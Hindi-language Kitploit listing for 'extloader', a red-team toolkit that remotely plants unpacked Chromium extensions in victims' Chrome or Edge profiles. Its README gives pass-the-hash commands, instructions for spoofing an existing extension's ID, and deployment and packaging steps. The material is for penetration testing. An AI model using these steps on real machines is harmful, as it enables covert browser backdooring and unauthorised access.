Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
extloader — एक क्रोमियम एक्सटेंशन शोषण टूलकिट | Kitploit
उपकरण/GitHubGitHub/synacktiv/extloader
स्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubsynacktiv/extloader

extloader

एक क्रोमियम एक्सटेंशन शोषण टूलकिट

रिपॉजिटरी देखें
26210 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

extLoader

छोटा टूलकिट जो अनपैक्ड Chromium एक्सटेंशन के प्रबंधन और परिनियोजन के लिए है।

अधिक जानकारी निम्न ब्लॉगपोस्ट में: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

स्थापना

प्रत्यक्ष स्थापना (pipx)

root@kitploit:~
pipx install .
extloader --help

अलग-अलग स्थापना के लिए pipx का उपयोग करें, जो Python 3.10+ को लक्षित करता है।

विकास सेटअप (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

प्रमाणीकरण विकल्प

  • पासवर्ड: -p/--password
  • हैश: -H/--hash (LM:NT प्रारूप या केवल NT)
  • डोमेन: -d/--domain (डिफ़ॉल्ट रूप से WORKGROUP)

सामान्य पैरामीटर

  • -t, --target: लक्ष्य IP/होस्टनाम
  • -u, --username: उपयोगकर्ता नाम
  • -i, --index: check कमांड से उपयोगकर्ता इंडेक्स
  • --debug: डीबग लॉगिंग सक्षम करें

उपयोग

एक्सटेंशन परिनियोजित करने का चरण-दर-चरण उदाहरण:

  1. पहले, उपलब्ध लक्ष्यों की जाँच करें:
root@kitploit:~
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

जब किसी अन्य मशीन पर exploit चलाएं, तो संदर्भ (available_targets.json) को ताज़ा करने के लिए पहले हमेशा check कमांड चलाएं।

  1. मैनिफेस्ट तैयार करें (किसी ID पर हस्ताक्षर करें या स्पूफ़ करें):
root@kitploit:~
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

किसी मौजूदा एक्सटेंशन ID को स्पूफ़ करने के लिए, उपरोक्त कमांड को छोड़ें और मैनिफेस्ट key को उस एक्सटेंशन की base64 सार्वजनिक कुंजी पर सेट करें जिसकी नकल की जा रही है। उस key को पुनः उपयोग करने से CRX ID अपरिवर्तित रहती है।

  1. एक्सटेंशन परिनियोजित करें:
root@kitploit:~
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension

4.(वैकल्पिक) मैन्युअल परिनियोजन के लिए पैकेज बनाएं:

root@kitploit:~
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file आपके द्वारा बैकअप की गई ब्राउज़र प्रोफ़ाइल प्राथमिकताओं की अपेक्षा करता है (Chrome/Edge उन्हें Secure Preferences के रूप में संग्रहीत करते हैं, अन्य Chromium ब्राउज़र Preferences का उपयोग करते हैं)। लोडर इसे कॉपी करता है, पैच करता है, और संशोधित तथा बिना संशोधित दोनों संस्करणों को पैकेज में शामिल करता है।

root@kitploit:~
├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json
  1. यदि आवश्यक हो तो मूल प्राथमिकताएँ पुनर्स्थापित करें:
root@kitploit:~
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences

TODO

  • Kerberos समर्थन
  • nxc मॉड्यूल
  • Linux के लिए package वर्कफ़्लो अनुकूलित करें
  • macOS के लिए package वर्कफ़्लो अनुकूलित करें
टूल डाउनलोड करें